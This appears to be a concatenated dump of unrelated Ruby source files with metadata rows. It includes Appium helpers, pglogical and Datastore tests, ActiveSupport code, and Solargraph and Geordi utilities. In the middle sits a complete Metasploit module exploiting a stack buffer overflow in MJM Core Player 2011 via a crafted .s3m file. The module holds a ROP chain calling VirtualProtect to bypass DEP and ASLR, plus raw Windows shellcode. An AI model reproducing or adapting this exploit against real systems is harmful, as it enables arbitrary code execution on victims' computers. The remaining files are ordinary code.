@strings_xml.select { |key, _value| key.downcase.include? target.downcase }
end
# Search strings.xml's keys for target.
# @param target [String] the target to search for in strings.xml keys
# @return [Array]
def xml_values(target)
lazy_load_strings
@strings_xml.select { |_key, value| value.downcase.include? target.downcase }
end
# Resolve id in strings.xml and return the value.
# @param id [String] the id to resolve
# @return [String]
def resolve_id(id)
lazy_load_strings
@strings_xml[id]
end
class HTMLElements < Nokogiri::XML::SAX::Document
attr_reader :filter
# convert to string to support symbols
def filter=(value)
# nil and false disable the filter
return @filter = false unless value
@filter = value.to_s.downcase
end
def initialize
reset
@filter = false
end
def reset
@element_stack = []
@elements_in_order = []
@skip_element = false
end
def result
@elements_in_order.reduce('') do |r, e|
name = e.delete :name
attr_string = e.reduce('') do |string, attr|
attr_1 = attr[1]
attr_1 = attr_1 ? attr_1.strip : attr_1
string + " #{attr[0]}: #{attr_1}\n"
end
unless attr_string.nil? || attr_string.empty?
r += "\n#{name}\n#{attr_string}"
end
r
end
end
def start_element(name, attrs = [])
@skip_element = filter && !filter.include?(name.downcase)
return if @skip_element
element = { name: name }
attrs.each { |a| element[a[0]] = a[1] }
@element_stack.push element
@elements_in_order.push element
end
def end_element(name)
return if filter && !filter.include?(name.downcase)
element_index = @element_stack.rindex { |e| e[:name] == name }
@element_stack.delete_at element_index
end
def characters(chars)
return if @skip_element
element = @element_stack.last
element[:text] = chars
end
end
def _no_such_element
fail Selenium::WebDriver::Error::NoSuchElementError,
'An element could not be located on the page using the given search parameters.'
end
end # module Common
end # module Appium
| 29.080717 | 102 | 0.620971 |
7947f13f3e329ab6b955056d93db5d8ca7c90218 | 8,224 | describe "ar_pglogical extension" do
let(:connection) { ActiveRecord::Base.connection }
around do |example|
pool = ActiveRecord::Base.establish_connection(
:adapter => "postgresql",
:database => "pg_pglogical_test",
:pool => 1
)
pool.connection.transaction do
begin
example.call
ensure
raise ActiveRecord::Rollback
end
end
ActiveRecord::Base.remove_connection
end
describe "#enable" do
it "enables the pglogical extension" do
connection.pglogical.enable
expect(connection.extensions).to include("pglogical")
end
end
describe "#enabled?" do
it "detects that the extensions are not enabled" do
expect(connection.pglogical.enabled?).to be false
end
end
context "with the extensions enabled" do
let(:node_name) { "test-node" }
let(:node_dsn) { "host=host.example.com dbname=vmdb_test" }
before do
connection.pglogical.enable
end
describe "#enabled?" do
it "detects that the extensions are enabled" do
expect(connection.pglogical.enabled?).to be true
end
end
describe "#disable" do
it "disables the pglogical extension" do
connection.pglogical.disable
expect(connection.extensions).not_to include("pglogical")
end
end
describe "#node_create" do
it "creates a node" do
connection.pglogical.node_create(node_name, node_dsn)
res = connection.exec_query(<<-SQL).first
SELECT node_name, if_dsn
FROM pglogical.node JOIN pglogical.node_interface
ON node_id = if_nodeid
LIMIT 1
SQL
expect(res["node_name"]).to eq(node_name)
expect(res["if_dsn"]).to eq(node_dsn)
end
end
context "with a node" do
before do
connection.pglogical.node_create(node_name, node_dsn)
end
describe "#nodes" do
it "lists the node's names and connection strings" do
expected = {
"name" => node_name,
"conn_string" => node_dsn
}
expect(connection.pglogical.nodes.first).to eq(expected)
end
end
describe "#node_drop" do
it "removes a node" do
connection.pglogical.node_drop(node_name)
res = connection.exec_query(<<-SQL)
SELECT node_name
FROM pglogical.node
SQL
expect(res.rows.flatten).not_to include(node_name)
end
end
describe "#node_dsn_update" do
let(:new_dsn) { "host='newhost.example.com' dbname='vmdb_test' user='root'" }
it "sets the dsn" do
expect(connection.pglogical.node_dsn_update(node_name, new_dsn)).to be true
dsn = connection.exec_query(<<-SQL).first["if_dsn"]
SELECT if_dsn
FROM pglogical.node_interface if
JOIN pglogical.node node ON
if.if_nodeid = node.node_id
WHERE node.node_name = '#{node_name}'
SQL
expect(dsn).to eq(new_dsn)
end
end
describe "#replication_set_create" do
it "creates a replication set" do
rep_insert = true
rep_update = true
rep_delete = true
rep_trunc = false
connection.pglogical.replication_set_create("test-set", rep_insert,
rep_update, rep_delete, rep_trunc)
res = connection.exec_query(<<-SQL)
SELECT *
FROM pglogical.replication_set
WHERE set_name = 'test-set'
SQL
expect(res.count).to eq(1)
row = res.first
expect(row["replicate_insert"]).to be true
expect(row["replicate_update"]).to be true
expect(row["replicate_delete"]).to be true
expect(row["replicate_truncate"]).to be false
end
end
context "with a replication set" do
let(:set_name) { "test-set" }
before do
connection.pglogical.replication_set_create(set_name)
end
describe "#replication_sets" do
it "lists the set names" do
expected = ["default", "default_insert_only", "ddl_sql", set_name]
expect(connection.pglogical.replication_sets).to match_array(expected)
end
end
describe "#replication_set_alter" do
it "alters the replication set" do
connection.pglogical.replication_set_alter(set_name, true, true,
false, false)
row = connection.exec_query(<<-SQL).first
SELECT *
FROM pglogical.replication_set
WHERE set_name = '#{set_name}'
SQL
expect(row["replicate_insert"]).to be true
expect(row["replicate_update"]).to be true
expect(row["replicate_delete"]).to be false
expect(row["replicate_truncate"]).to be false
end
end
describe "#replication_set_drop" do
it "removes a replication set" do
connection.pglogical.replication_set_drop(set_name)
res = connection.exec_query(<<-SQL)
SELECT *
FROM pglogical.replication_set
WHERE set_name = '#{set_name}'
SQL
expect(res.count).to eq(0)
end
end
describe "#replication_set_*_table" do
it "adds and removes a table to/from the set" do
# create a test table
connection.exec_query(<<-SQL)
CREATE TABLE test (id INTEGER PRIMARY KEY)
SQL
connection.pglogical.replication_set_add_table(set_name, "test")
res = connection.exec_query(<<-SQL)
SELECT *
FROM pglogical.tables
WHERE relname = 'test'
SQL
expect(res.first["set_name"]).to eq(set_name)
connection.pglogical.replication_set_remove_table(set_name, "test")
res = connection.exec_query(<<-SQL)
SELECT *
FROM pglogical.tables
WHERE relname = 'test'
SQL
expect(res.first["set_name"]).to be nil
end
end
describe "#replication_set_add_all_tables" do
it "adds all the tables in a schema" do
schema_name = "test_schema"
connection.exec_query("CREATE SCHEMA #{schema_name}")
connection.exec_query(<<-SQL)
CREATE TABLE #{schema_name}.test1 (id INTEGER PRIMARY KEY)
SQL
connection.exec_query(<<-SQL)
CREATE TABLE #{schema_name}.test2 (id INTEGER PRIMARY KEY)
SQL
connection.pglogical.replication_set_add_all_tables(set_name, [schema_name])
set_tables = connection.exec_query(<<-SQL).rows.flatten
SELECT relname
FROM pglogical.tables
WHERE set_name = '#{set_name}'
SQL
expect(set_tables).to include("test1")
expect(set_tables).to include("test2")
end
end
describe "#tables_in_replication_set" do
it "lists the tables in the set" do
# create a test table
connection.exec_query(<<-SQL)
CREATE TABLE test (id INTEGER PRIMARY KEY)
SQL
connection.pglogical.replication_set_add_table(set_name, "test")
expect(connection.pglogical.tables_in_replication_set(set_name)).to eq(["test"])
end
end
describe "#with_replication_set_lock" do
it "takes a lock on the replication set table" do
connection.pglogical.with_replication_set_lock(set_name) do
result = connection.exec_query(<<-SQL)
SELECT 1
FROM pg_locks JOIN pg_class
ON pg_locks.relation = pg_class.oid
WHERE
pg_class.relname = 'replication_set' AND
pg_locks.mode = 'RowShareLock'
SQL
expect(result.count).to eq(1)
end
end
end
end
end
end
end
| 31.509579 | 92 | 0.578064 |
08d32e4615103d2655b0c7e2267f9cbe16e1a45d | 5,948 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'MJM Core Player 2011 .s3m Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in MJM Core Player 2011
When opening a malicious s3m file in this applications, a stack buffer overflow can be
triggered, resulting in arbitrary code execution.
This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rick2600', #found the vulnerabilities
'corelanc0d3r <peter.ve[at]corelan.be>', #rop exploit + msf module
],
'References' =>
[
[ 'OSVDB', '72101'],
[ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-004' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 2339, #about 0x900 bytes
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal Generic DEP & ASLR Bypass',
{
'OffSet' => 819, #core player.exe
'Ret' => 0x1000156f, #core player.exe
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Apr 30 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 's3m file', 'song.s3m']),
], self.class)
end
def junk
return rand_text(4).unpack("L")[0].to_i
end
def exploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
header = "\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41\x41"
header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x10\x00\x00"
header << "\x24\x00\x00\x01\x00\x0d\x08\x00\x20\x13\x02\x00\x53\x43\x52\x4d"
header << "\x40\x06\x94\xb0\x10\xfc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
header << "\x00\x08\x01\x09\x02\x0a\x03\x0b\x04\x0c\xff\xff\xff\xff\xff\xff"
header << "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
header << "\x06\x00\x03\x01\x02\x04\x05\x07\x08\x09\x09\x0a\x0b\x0c\x0d\x0e"
header << "\x0f\x10\x10\x11\x12\x13\x14\x15\x16\x16\x17\x18\x19\x18\x1a\x1b"
header << "\x1b\x1c\xff\xff\x13\x00\x18\x00\x1d\x00\x22\x00\x27\x00\x2c\x00"
header << "\x31\x00\x36\x00\x3b\x00\x40\x00\x45\x00\x4a\x00\x4f\x00\x54\x00"
header << "\x59\x00\x5e\x00\x63\x00\x68\x00\x6d\x00\x72\x00\x77\x00\x7c\x00"
header << "\x81\x00\x86\x00\x8b\x00\x90\x00\x95\x00\x9a\x00\x9f\x00\xa4\x00"
header << "\xa9\x00\xae\x00\xb3\x00\xb8\x00\xbd\x00\xc2\x00\xc7\x00\xcc\x00"
header << "\xd1\x00\xd6\x00\xdb\x00\xe0\x00\x14\x01\x4d\x01\x87\x01\xc0\x01"
header << "\x0e\x02\x5a\x02\x9a\x02\xe9\x02\x40\x03\x7f\x03\xc0\x03\x01\x04"
header << "\x28\x04\x52\x04\x86\x04\xb9\x04\xea\x04\x1a\x05\x41\x05\x6e\x05"
header << "\x96\x05\xbc\x05\xeb\x05\x25\x06\x78\x06\xcc\x06\x21\x07\x72\x07"
header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
header << "\x01"
footer = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52"
footer << "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
footer << "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"
footer << "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0"
footer << "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"
footer << "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff"
footer << "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d"
footer << "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b"
footer << "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"
footer << "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
footer << "\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68"
footer << "\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95"
footer << "\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
footer << "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x00"
footer << "\x00\x00\x00\x00\x00\x00\x00\x00"
print_status("Preparing payload")
pivot = [target.ret].pack('V')
rop_gadgets =
[
# pvefindaddr rop 'n roll
0x004c0021, # POP ECX # RETN
0x00000000,
0x0042850e, # PUSH ESP # ADD EDI,EDI # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0C
junk,
junk,
junk,
0x00461248, # MOV EAX,EDI # POP EDI # POP ESI # RETN
junk,
junk,
junk,
junk,
junk,
0x004ac31d, # POP EBX # RETN
0x00000900,
0x004a8032, # POP ESI # RETN
0x00000080,
0x10009ea7, # ADD EAX,ESI # POP ESI # RETN
junk,
0x004def0d, # XCHG EAX,EBP # RETN
0x004c0145, # POP EAX # RETN
0x005e0ae0, # VirtualProtect
0x00408242, # MOV EAX,DWORD PTR DS:[EAX] # RETN
0x0052001a, # XCHG EAX,ESI # RETN 00
0x004c0729, # POP EDX # RETN
0x00000040,
0x004c0021, # POP ECX # RETN
0x00401000, # RW
0x00448142, # POP EDI # RETN
0x004ae7ce, # RET
0x004c0145, # POP EAX # RETN
0x004ae7ce, # RET
0x0052158e, # PUSHAD # RETN 00
].pack("V*")
buffer = rand_text(target['OffSet'])
buffer << pivot
buffer << rop_gadgets
buffer << make_nops(100)
buffer << payload.encoded
filecontent = header + buffer + footer
print_status("Writing payload to file")
file_create(filecontent)
end
end
| 36.048485 | 94 | 0.594317 |
7a4b15cd71c712e0b3ecdfefd23108adbde74ef7 | 1,223 | # frozen_string_literal: true
require "abstract_unit"
require "active_support/core_ext/array"
require "active_support/core_ext/hash"
class ExtractOptionsTest < ActiveSupport::TestCase
class HashSubclass < Hash
end
class ExtractableHashSubclass < Hash
def extractable_options?
true
end
end
def test_extract_options
assert_equal({}, [].extract_options!)
assert_equal({}, [1].extract_options!)
assert_equal({ a: :b }, [{ a: :b }].extract_options!)
assert_equal({ a: :b }, [1, { a: :b }].extract_options!)
end
def test_extract_options_doesnt_extract_hash_subclasses
hash = HashSubclass.new
hash[:foo] = 1
array = [hash]
options = array.extract_options!
assert_equal({}, options)
assert_equal([hash], array)
end
def test_extract_options_extracts_extractable_subclass
hash = ExtractableHashSubclass.new
hash[:foo] = 1
array = [hash]
options = array.extract_options!
assert_equal({ foo: 1 }, options)
assert_equal([], array)
end
def test_extract_options_extracts_hash_with_indifferent_access
array = [{ foo: 1 }.with_indifferent_access]
options = array.extract_options!
assert_equal(1, options[:foo])
end
end
| 25.479167 | 64 | 0.708913 |
ed0dccdfd0d65d92de4071e9a7f1aac39bd3cd8b | 536 | lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'imgix-optimizer/version'
Gem::Specification.new do |s|
s.name = 'imgix-optimizer'
s.version = Imgix::Optimizer::VERSION
s.authors = ['Sean C Davis']
s.email = '[email protected]'
s.summary = ''
s.homepage = 'https://www.ample.co/'
s.license = 'MIT'
s.require_paths = ['lib']
s.files = `git ls-files`.split($/)
s.add_development_dependency 'rake'
end
| 29.777778 | 55 | 0.610075 |
f7ed7f6b13dbc6d7265b948d14bd44504019c868 | 2,945 | #--
# Copyright (c) 2005 David Heinemeier Hansson
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#++
module ActiveSupport
def self.load_all!
[Dependencies, Deprecation, Gzip, MessageVerifier, Multibyte, SecureRandom, TimeWithZone]
end
autoload :BacktraceCleaner, 'active_support/backtrace_cleaner'
autoload :Base64, 'active_support/base64'
autoload :BasicObject, 'active_support/basic_object'
autoload :BufferedLogger, 'active_support/buffered_logger'
autoload :Cache, 'active_support/cache'
autoload :Callbacks, 'active_support/callbacks'
autoload :Deprecation, 'active_support/deprecation'
autoload :Duration, 'active_support/duration'
autoload :Gzip, 'active_support/gzip'
autoload :Inflector, 'active_support/inflector'
autoload :Memoizable, 'active_support/memoizable'
autoload :MessageEncryptor, 'active_support/message_encryptor'
autoload :MessageVerifier, 'active_support/message_verifier'
autoload :Multibyte, 'active_support/multibyte'
autoload :OptionMerger, 'active_support/option_merger'
autoload :OrderedHash, 'active_support/ordered_hash'
autoload :OrderedOptions, 'active_support/ordered_options'
autoload :Rescuable, 'active_support/rescuable'
autoload :SafeBuffer, 'active_support/core_ext/string/output_safety'
autoload :SecureRandom, 'active_support/secure_random'
autoload :StringInquirer, 'active_support/string_inquirer'
autoload :TimeWithZone, 'active_support/time_with_zone'
autoload :TimeZone, 'active_support/values/time_zone'
autoload :XmlMini, 'active_support/xml_mini'
end
require 'active_support/version_switches'
require 'active_support/integer_class'
require 'active_support/legacy_methods'
require 'active_support/vendor'
require 'active_support/core_ext'
require 'active_support/vendor_patches'
require 'active_support/dependencies'
require 'active_support/json'
I18n.load_path << "#{File.dirname(__FILE__)}/active_support/locale/en.yml"
| 45.307692 | 93 | 0.800679 |
e9a31bdfe4825ee7f1462c180bb4599244558e7a | 2,066 | # frozen_string_literal: true
module Solargraph
module Diagnostics
# Utility methods for the RuboCop diagnostics reporter.
#
module RubocopHelpers
module_function
# Requires a specific version of rubocop, or the latest installed version
# if _version_ is `nil`.
#
# @param version [String]
# @raise [InvalidRubocopVersionError] if _version_ is not installed
def require_rubocop(version = nil)
begin
gem_path = Gem::Specification.find_by_name('rubocop', version).full_gem_path
gem_lib_path = File.join(gem_path, 'lib')
$LOAD_PATH.unshift(gem_lib_path) unless $LOAD_PATH.include?(gem_lib_path)
rescue Gem::MissingSpecVersionError => e
raise InvalidRubocopVersionError,
"could not find '#{e.name}' (#{e.requirement}) - "\
"did find: [#{e.specs.map { |s| s.version.version }.join(', ')}]"
end
require 'rubocop'
end
# Generate command-line options for the specified filename and code.
#
# @param filename [String]
# @param code [String]
# @return [Array(Array<String>, Array<String>)]
def generate_options filename, code
args = ['-f', 'j', filename]
base_options = RuboCop::Options.new
options, paths = base_options.parse(args)
options[:stdin] = code
[options, paths]
end
# RuboCop internally uses capitalized drive letters for Windows paths,
# so we need to convert the paths provided to the command.
#
# @param path [String]
# @return [String]
def fix_drive_letter path
return path unless path.match(/^[a-z]:/)
path[0].upcase + path[1..-1]
end
# @todo This is a smelly way to redirect output, but the RuboCop specs do
# the same thing.
# @return [String]
def redirect_stdout
redir = StringIO.new
$stdout = redir
yield if block_given?
$stdout = STDOUT
redir.string
end
end
end
end
| 32.28125 | 86 | 0.613262 |
26cb166a579461d4f30db93ffe3f806880c1c03b | 1,015 | desc 'setup', 'Setup a project for the first time'
long_desc <<-LONGDESC
Example: `geordi setup`
Check out a repository and cd into its directory. Then let `setup` do the tiring
work: run `bundle install`, create `database.yml`, create databases, migrate
(all if applicable).
If a local bin/setup file is found, Geordi skips its routine and runs bin/setup
instead.
LONGDESC
option :dump, type: :string, aliases: '-d', banner: 'TARGET',
desc: 'After setup, dump the TARGET db and source it into the development db'
option :test, type: :boolean, aliases: '-t', desc: 'After setup, run tests'
def setup
if File.exist? 'bin/setup'
Interaction.announce 'Running bin/setup'
Interaction.note "Geordi's own setup routine is skipped"
Util.run!('bin/setup')
else
invoke_geordi 'create_databases'
invoke_geordi 'migrate'
end
Interaction.success 'Successfully set up the project.'
invoke_geordi 'dump', options.dump, load: true if options.dump
invoke_geordi 'tests' if options.test
end
| 30.757576 | 80 | 0.733005 |
382bffcab7f05d33fe2f92e409428a5fa8b4c538 | 738 | require "fileutils"
module MobRotation
class Database
def sanitized_entries_in
each_database_entry(@filename) do |entry|
yield(entry.to_s.strip)
end
end
def initialize(filename)
@filename = filename
FileUtils.touch(filename) unless File.exist?(filename)
end
def write(mobsters)
File.open(@filename, "w") do |file|
mobsters.each do |mobster|
file << format_mobster(mobster.name, mobster.email) << "\n"
end
end
end
def format_mobster(name, email)
name + (" <#{email}>" if email && !email.empty?).to_s
end
def each_database_entry(filename)
File.readlines(filename).collect { |entry| yield(entry) }
end
end
end
| 22.363636 | 69 | 0.630081 |
b9cc05747066d1e53c704b62de4ca3e62f0cb740 | 7,916 | # Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "helper"
describe Google::Cloud::Datastore::Entity, :exclude_from_indexes, :mock_datastore do
let(:entity) do
Google::Cloud::Datastore::Entity.new.tap do |ent|
ent.key = Google::Cloud::Datastore::Key.new "User", "username"
ent["name"] = "User McUser"
ent["email"] = "[email protected]"
end
end
it "converts indexed value to not excluded from a GRPC object" do
grpc = Google::Datastore::V1::Entity.new
grpc.key = Google::Datastore::V1::Key.new
grpc.key.path << Google::Datastore::V1::Key::PathElement.new(kind: "User", id: 123456)
grpc.properties["name"] = Google::Cloud::Datastore::Convert.to_value "User McNumber"
entity_from_grpc = Google::Cloud::Datastore::Entity.from_grpc grpc
entity_from_grpc.exclude_from_indexes?("name").must_equal false
end
it "converts indexed list to not excluded from a GRPC object" do
grpc = Google::Datastore::V1::Entity.new
grpc.key = Google::Datastore::V1::Key.new
grpc.key.path << Google::Datastore::V1::Key::PathElement.new(kind: "User", id: 123456)
grpc.properties["tags"] = Google::Cloud::Datastore::Convert.to_value ["ruby", "code"]
entity_from_grpc = Google::Cloud::Datastore::Entity.from_grpc grpc
entity_from_grpc.exclude_from_indexes?("tags").must_equal [false, false]
end
it "doesn't exclude from indexes by default" do
refute entity.exclude_from_indexes?("name")
refute entity.exclude_from_indexes?("email")
grpc = entity.to_grpc
grpc.properties["name"].exclude_from_indexes.must_equal false
grpc.properties["email"].exclude_from_indexes.must_equal false
end
it "excludes when setting a boolean" do
entity["age"] = 21
entity.exclude_from_indexes! "age", true
entity.exclude_from_indexes?("age").must_equal true
grpc = entity.to_grpc
grpc.properties["age"].exclude_from_indexes.must_equal true
end
it "excludes when setting a Proc" do
entity["age"] = 21
entity.exclude_from_indexes! "age" do |age|
age > 18
end
entity.exclude_from_indexes?("age").must_equal true
grpc = entity.to_grpc
grpc.properties["age"].exclude_from_indexes.must_equal true
# And now the inverse, the Proc evaluates to false
entity.exclude_from_indexes! "age" do |age|
age < 18
end
entity.exclude_from_indexes?("age").must_equal false
grpc = entity.to_grpc
grpc.properties["age"].exclude_from_indexes.must_equal false
end
it "excludes when setting an Array on a non array value" do
entity["age"] = 21
entity.exclude_from_indexes! "age", [true, false, true, false]
entity.exclude_from_indexes?("age").must_equal true
grpc = entity.to_grpc
grpc.properties["age"].exclude_from_indexes.must_equal true
# And now the inverse, the first value is false
entity.exclude_from_indexes! "age", [false, true, false, true]
entity.exclude_from_indexes?("age").must_equal false
grpc = entity.to_grpc
grpc.properties["age"].exclude_from_indexes.must_equal false
end
describe Array do
it "doesn't exclude Array values from indexes by default" do
entity["tags"] = ["ruby", "code"]
entity.exclude_from_indexes?("tags").must_equal [false, false]
grpc = entity.to_grpc
tag_grpc = grpc.properties["tags"]
tag_grpc.exclude_from_indexes.must_equal false
tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [false, false]
end
it "excludes an Array when setting a boolean" do
entity["tags"] = ["ruby", "code"]
entity.exclude_from_indexes! "tags", true
entity.exclude_from_indexes?("tags").must_equal [true, true]
grpc = entity.to_grpc
tag_grpc = grpc.properties["tags"]
tag_grpc.exclude_from_indexes.must_equal false
tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [true, true]
end
it "excludes an Array when setting a Proc" do
entity["tags"] = ["ruby", "code"]
entity.exclude_from_indexes! "tags" do |tag|
tag =~ /r/
end
entity.exclude_from_indexes?("tags").must_equal [true, false]
grpc = entity.to_grpc
tag_grpc = grpc.properties["tags"]
tag_grpc.exclude_from_indexes.must_equal false
tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [true, false]
# And now the inverse, the Proc evaluates to false
entity["tags"] = ["ruby", "code"]
entity.exclude_from_indexes! "tags" do |tag|
tag =~ /c/
end
entity.exclude_from_indexes?("tags").must_equal [false, true]
grpc = entity.to_grpc
tag_grpc = grpc.properties["tags"]
tag_grpc.exclude_from_indexes.must_equal false
tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [false, true]
end
it "excludes an Array when setting an Array" do
entity["tags"] = ["ruby", "code"]
entity.exclude_from_indexes! "tags", [true, false]
entity.exclude_from_indexes?("tags").must_equal [true, false]
grpc = entity.to_grpc
tag_grpc = grpc.properties["tags"]
tag_grpc.exclude_from_indexes.must_equal false
tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [true, false]
end
it "excludes an Array when setting an Array that is too small" do
entity["tags"] = ["ruby", "code", "google", "cloud"]
entity.exclude_from_indexes! "tags", [true, false]
# the default is to not exclude when the array is too small
entity.exclude_from_indexes?("tags").must_equal [true, false, false, false]
grpc = entity.to_grpc
tag_grpc = grpc.properties["tags"]
tag_grpc.exclude_from_indexes.must_equal false
tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [true, false, false, false]
end
it "excludes an Array when setting an Array that is too big" do
entity["tags"] = ["ruby", "code"]
entity.exclude_from_indexes! "tags", [true, false, true, false, true, false]
entity.exclude_from_indexes?("tags").must_equal [true, false]
grpc = entity.to_grpc
tag_grpc = grpc.properties["tags"]
tag_grpc.exclude_from_indexes.must_equal false
tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [true, false]
# Now add to the entity and get the previously stored exclude values
entity["tags"] = ["ruby", "code", "google", "cloud"]
entity.exclude_from_indexes?("tags").must_equal [true, false, true, false]
grpc = entity.to_grpc
tag_grpc = grpc.properties["tags"]
tag_grpc.exclude_from_indexes.must_equal false
tag_grpc.array_value.values.map(&:exclude_from_indexes).must_equal [true, false, true, false]
end
end
describe "Edge Cases" do
it "recalculates when changing from a single value to an array" do
entity["tags"] = "ruby"
entity.exclude_from_indexes?("tags").must_equal false
entity.exclude_from_indexes! "tags", true
entity.exclude_from_indexes?("tags").must_equal true
entity["tags"] = ["ruby", "code"]
entity.exclude_from_indexes?("tags").must_equal [true, true]
entity.exclude_from_indexes! "tags", [false, false]
entity["tags"] = "ruby"
entity.exclude_from_indexes?("tags").must_equal false
end
end
end
| 32.310204 | 100 | 0.69429 |
7935f26a10115962375e178b296de2f83f121592 | 814 | module OdfCore
module Element
module Text
class NoteBody < AbstractElement
XML_ELEMENT_NAME = 'text:note-body'
CHILDREN = [
"dr3d:scene",
"draw:a",
"draw:caption",
"draw:circle",
"draw:connector",
"draw:control",
"draw:custom-shape",
"draw:ellipse",
"draw:frame",
"draw:g",
"draw:line",
"draw:measure",
"draw:page-thumbnail",
"draw:path",
"draw:polygon",
"draw:polyline",
"draw:rect",
"draw:regular-polygon",
"table:table",
"text:alphabetical-index",
"text:bibliography",
"text:change",
].freeze
ATTRIBUTES = [].freeze
end
end
end
end
| 21.421053 | 43 | 0.470516 |
087f632fc41c49eb60c48b337f3de4b8ba3c3776 | 1,117 | class CurveCubicsController < ApplicationController
before_action :authenticate_user!
load_and_authorize_resource param_method: :curve_cubic_params
before_action :set_curve_cubic, only: [:show, :edit, :update, :destroy]
respond_to :html
def index
@curve_cubics = CurveCubic.all
respond_with(@curve_cubics)
end
def show
respond_with(@curve_cubic)
end
def new
@curve_cubic = CurveCubic.new
respond_with(@curve_cubic)
end
def edit
end
def create
@curve_cubic = CurveCubic.new(curve_cubic_params)
@curve_cubic.save
respond_with(@curve_cubic)
end
def update
@curve_cubic.update(curve_cubic_params)
respond_with(@curve_cubic)
end
def destroy
@curve_cubic.destroy
respond_with(@curve_cubic)
end
private
def set_curve_cubic
@curve_cubic = CurveCubic.find(params[:id])
end
def curve_cubic_params
params.require(:curve_cubic).permit(:name, :curve_coefficient1, :curve_coefficient2, :curve_coefficient3, :curve_coefficient4, :curve_maximum_out, :curve_maximum_var1, :curve_minimum_out, :curve_minimum_var1)
end
end
| 21.901961 | 212 | 0.752014 |
ed4da581e71560396a24654c982f32a249aa10db | 75 | require "lib/hello_helper"
helpers HelloHelper
page "/", :layout => false
| 15 | 26 | 0.733333 |
1d4ced60f011da211903cd4de5531410f6de2349 | 335 | class CreateProfiles < ActiveRecord::Migration[5.0]
def change
create_table :profiles do |t|
t.references :user, foreign_key: true
t.date :birthday
t.string :birthplace
t.string :currentplace
t.string :education
t.string :occupation
t.text :bio
t.timestamps
end
end
end
| 20.9375 | 51 | 0.638806 |
ac66ab64557ddc8e68d70f29dd82bd6f7b0eaca6 | 65 | class Entrylog < ApplicationRecord
serialize :content, JSON
end
| 16.25 | 34 | 0.815385 |
7ad97665deff50fb360aedad20ddb6528f4da658 | 1,177 | module ErlangConfig
